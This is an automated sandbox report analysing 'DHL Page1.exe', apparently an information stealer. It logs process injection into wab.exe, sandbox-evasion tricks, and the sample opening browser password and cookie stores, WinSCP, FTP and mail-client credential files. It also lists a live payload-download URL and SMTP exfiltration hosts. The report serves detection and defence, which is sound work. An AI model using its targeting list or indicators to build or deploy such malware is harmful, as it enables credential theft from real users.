      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
      Source: C:\Users\user\Desktop\DHL Page1.exeAPI/Special instruction interceptor: Address: 847E230
      Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 6C8E230
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 470000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 37770000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 37680000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 800Jump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\DHL Page1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dllJump to dropped file
      Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6224Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6224Thread sleep time: -100000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3252Thread sleep count: 800 > 30Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6224Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00406577 FindFirstFileW,FindClose,0_2_00406577
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00405A25 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A25
      Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wab.exe, 00000004.00000002.127055355924.000000000271C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
      Source: C:\Users\user\Desktop\DHL Page1.exeAPI call chain: ExitProcess graph end nodegraph_0-4381
      Source: C:\Users\user\Desktop\DHL Page1.exeAPI call chain: ExitProcess graph end nodegraph_0-4538
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E43
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\DHL Page1.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 47FD28Jump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\DHL Page1.exe"Jump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\DHL Page1.exeCode function: 0_2_00406256 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406256
      Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
      Source: Yara matchFile source: 00000004.00000002.127076986570.00000000377C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Disable or Modify Tools
      2
      OS Credential Dumping
      2
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      Access Token Manipulation
      1
      Obfuscated Files or Information
      1
      Credentials in Registry
      126
      System Information Discovery
      Remote Desktop Protocol2
      Data from Local System
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
      Process Injection
      1
      DLL Side-Loading
      Security Account Manager211
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
      Masquerading
      NTDS141
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Clipboard Data
      13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
      Virtualization/Sandbox Evasion
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Access Token Manipulation
      Cached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
      Process Injection
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      DHL Page1.exe100%AviraHEUR/AGEN.1331786
      DHL Page1.exe13%ReversingLabsWin32.Trojan.Generic
      DHL Page1.exe13%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll1%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll0%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLink
      api.ipify.org0%VirustotalBrowse
      smtp.gmail.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://api.ipify.org/0%Avira URL Cloudsafe
      http://crl.pki.goog/gsr1/gsr1.crl0;0%Avira URL Cloudsafe
      http://o.pki.goog/wr20%0%Avira URL Cloudsafe
      http://i.pki.goog/r1.crt00%Avira URL Cloudsafe
      http://c.pki.goog/r/r1.crl00%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe
      http://pki.goog/gsr1/gsr1.crt020%Avira URL Cloudsafe
      http://i.pki.goog/r1.crt00%VirustotalBrowse
      http://crl.pki.goog/gsr1/gsr1.crl0;0%VirustotalBrowse
      http://o.pki.goog/wr20%0%VirustotalBrowse
      https://api.ipify.org/0%VirustotalBrowse
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
      http://smtp.gmail.com0%Avira URL Cloudsafe
      http://c.pki.goog/r/r1.crl00%VirustotalBrowse
      http://pki.goog/gsr1/gsr1.crt020%VirustotalBrowse
      http://i.pki.goog/wr2.crt00%Avira URL Cloudsafe
      http://c.pki.goog/wr2/75r4ZyA3vA0.crl00%Avira URL Cloudsafe
      http://peraarae.nl/ViaMYxizkt11.bin0%Avira URL Cloudsafe
      http://smtp.gmail.com0%VirustotalBrowse
      http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
      http://c.pki.goog/wr2/75r4ZyA3vA0.crl00%VirustotalBrowse
      http://i.pki.goog/wr2.crt00%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ipify.org
      104.26.12.205
      truefalseunknown
      smtp.gmail.com
      172.253.62.108
      truefalseunknown
      peraarae.nl
      104.153.208.178
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://api.ipify.org/false
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://peraarae.nl/ViaMYxizkt11.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://crl.pki.goog/gsr1/gsr1.crl0;wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://o.pki.goog/wr20%wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://c.pki.goog/r/r1.crl0wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://i.pki.goog/r1.crt0wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.quovadis.bm0wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://pki.goog/gsr1/gsr1.crt02wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://nsis.sf.net/NSIS_ErrorErrorDHL Page1.exe, 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Page1.exe, 00000000.00000000.121985944583.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://ocsp.quovadisoffshore.com0wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://smtp.gmail.comwab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://i.pki.goog/wr2.crt0wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://c.pki.goog/wr2/75r4ZyA3vA0.crl0wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        104.26.12.205
        api.ipify.orgUnited States
        13335CLOUDFLARENETUSfalse
        172.253.62.108
        smtp.gmail.comUnited States
        15169GOOGLEUSfalse
        104.153.208.178
        peraarae.nlReserved
        32875VIRPUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1501086
        Start date and time:2024-08-29 12:20:32 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 15m 33s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name:Suspected Instruction Hammering
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:DHL Page1.exe
        Detection:MAL
        Classification:mal92.troj.spyw.evad.winEXE@3/12@3/3
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 92%
        • Number of executed functions: 104
        • Number of non-executed functions: 26
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtEnumerateValueKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.26.12.205fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        zE7Ken4cFt.dllGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        SecuriteInfo.com.Win64.DropperX-gen.20063.4917.exeGet hashmaliciousStealcBrowse
        • api.ipify.org/
        Zoom_workspace.htaGet hashmaliciousCobalt Strike, Clipboard HijackerBrowse
        • api.ipify.org/
        SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
        • api.ipify.org/
        SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
        • api.ipify.org/
        104.153.208.178FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
        • rabtbts.nl/SaOUJJyWvcSxh69.bin
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        api.ipify.orgUpit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
        • 172.67.74.152
        Great Wall Motor Sale Bank_Sift_Copy.Pdf.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
        • 104.26.13.205
        Programa de Mentoring y Apoyo a la Internacionalizaci#U00f3n.exeGet hashmaliciousGuLoaderBrowse
        • 104.26.13.205
        5649237431_23-10-23-08.49.23.0107.07.exeGet hashmaliciousGuLoaderBrowse
        • 104.26.12.205
        Hua San Particulars.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        BULK HARVEST - VESSEL PARTICULARS.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        Catalina - Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        SecuriteInfo.com.BackDoor.SpyBotNET.62.13095.12836.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.12.205
        rARKMONEY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 172.67.74.152
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
        • 172.64.41.3
        Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        Autofill Manufacturing Sdn Bhd 28-08-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 188.114.97.3
        Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
        • 188.114.96.3
        G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
        • 172.67.74.152
